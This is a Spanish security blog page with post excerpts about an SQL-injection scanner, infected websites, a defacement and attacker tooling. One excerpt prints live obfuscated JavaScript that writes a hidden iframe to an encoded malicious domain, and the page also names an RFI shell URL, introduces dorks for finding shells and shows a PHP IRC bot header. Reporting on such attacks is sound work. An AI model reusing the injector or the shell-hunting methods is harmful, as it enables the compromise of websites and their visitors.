Desde el Blog de Mark Painter (The HP Security Laboratory Blog) podemos descargar Scrawlr, una herramienta de HP para sistemas operativos Windows (Quizás con Wine…) que realiza un escáner a tu sitio web en busca de debilidades que puedan facilitar a un atacante una inyección SQL. Después del revuelo de los ataques masivos vía SQL, no está de mas probar ésta herramienta gratuita.

Descarga SCrawlr desde la web oficial de HP rellenando éste formulario.

Más información sobre los ataques masivos aquí:  http://www.computerworld.com/

Scrawlr FAQ:   h30507.www3.hp.com

Otros: PowerPoint de Isabel Gomez y Miguel Jimenez/Defensa_contra_ataques_web_comunes

Ésta página web de supuestos enlaces ed2k, cada vez que es refrescada o cargada intenta inyectar código detectado por las firmas de algunos antivirus como HTML Small.bkr.106, iframe o Trojan.

(<body bgcolor=”#000000″ text=”#000001″><script>sa=”%6B%73%69%65%6E%61%2E%6E%65%74″;eval(function(p,a,c,k,e,d){while(c–){if(k[c]){p=p.rep______(new RegExp(‘\\b’+c.toString(a)+’\\b’,'g’),k[c])}}return p}(‘a(0.4.7(“5=s”)==-1&&9.8.7(“f 6″)!=-1){0.4=”5=s; e=c, 2 g b 2:d:h p; “;0.r(“<3 q=1 t=1 o=\’n://”+j+”/i/\’ k=\’l:m\’></3>”)}’,30,30,’document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015…

…Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height’.split(‘|’)));</script>
<p align=”center” style=”line-height: 0; margin-top: -1; margin-bottom: -1″><font face=”Trebuchet MS” color=”#000000″ style=”font-size: 1pt”>)

El dominio es el siguiente: En la raíz somos redireccionados a éste otro dominio.

Read the rest of this entry

Saben los administradores de éstos sitios que sus webs están infectadas y que están siendo utilizadas para atacar y a su vez seguir vulnerando mas websites, o simplemente lo ignoran?
Algunos como veréis hacen sus primeros pinitos montando un servidor propio. Los “menos tontos” vulneran webs ajenas a diestro y siniestro utilizándolas con diferentes fines.
Juzgad vosotros mismos:

El ya ultra-magreado e incesable escáner Feel CoMz

De ejemplo algunas de las webs vulneradas y atacantes en los últimos días:

• http://ecohearth.com

• http://ecohearth.com/tmp/id.txt??

-Click en la  imagen para ampliarla- Read the rest of this entry

Hace unas horas la web Diario Sabadell (diariosabadell.com) publicaba una noticia con una foto ilustrativa un poco alejada del artículo original. Seguramente ha sido un pequeño incidente en forma de RFI y no un despiste del editor a la hora de elegir la imagen del post… (Ni RFI, ni error, ni nada parecido, parece ser que los administradores del sitio bajo la excusa de que “cualquiera puede enviar noticias” suben éste tipo de fotos para crear polémica, a la vez que visitas y hasta algún fan, quién sabe. Esto también ocurre en Diario Barcelona, otra de las webs de ésta peculiar gente, donde también le han cogido un especial aprecio a la sección Muy actual. Una manera de promoción un poco extraña si que es, de eso no cabe duda.

Todavía podéis ver el artículo sin corregir en éste enlace. La notícia no sé que os parecerá, pero os aseguramos que Dominique Strauss-Kahn gana mucho más sin ropa viendo la noticia desde el punto de vista del diario local barcelonés. Aúpa!

Para ampliar las imágenes, haga click sobre las mismas

La web captureflags, a día de hoy ha sufrido ésta desfiguración, causada por una personaje que responde al nick de  c0m37 o “h311c0m3 1337″. Ésto se podría entender viendo la siguiente captura de la misma web (Caché del googlebot) donde se puede ver que el sitio alojaba una shell (Con publicidad incluida!!). Google, posee un Bot realmente potente, el cual nos hace capturas instantaneas de las webs (dónde tiene permisos, claro), ésto puede ser una ventaja a la hora de localizar malhechores, si cuentas con ésta información:

Para ampliar las imágenes, haga click sobre las mismas

Dorks: Mediante la colocación de estos “codigos” en google (o cualquier otro buscador) obtendremos algunos resultados interesantes para después poder conseguir información de los usuarios que han creado, modificado y/o utilizado estas herramientas desfasadas pero aún efectivas para webs escritas en PHP. Son muy usados por los defacers en listados .txt extensos, automatizando mediante otros scripts PHP la búsqueda de vulnerabilidades.

Algunos de los dorks usados para encontrar Shells en Goolge podrían ser los siguientes:

Read the rest of this entry

Últimamente se está notando un verdadero crecimiento de usuarios que se sienten atraídos por la culturilla “Underground” y se adentran en ella usando herramientas preparadas para automatizar y facilitar ataques sin necesidad de tener grandes conocimientos de informática.  Una de las herramientas mas usadas son los IRC BOT en PHP.

<?php
/*
+---------------------------------------------+
|#############################################|
|#[ FKM_net PHP BOT IRC v1.5	            ]#|
|#[ By HilanG- 	 		            ]#|
|#[  2008 guitar Community	            ]#|
|#[ irc: #guitar @ allnetwork.org           ]#|
|#############################################|
+---------------------------------------------+ Read the rest of this entry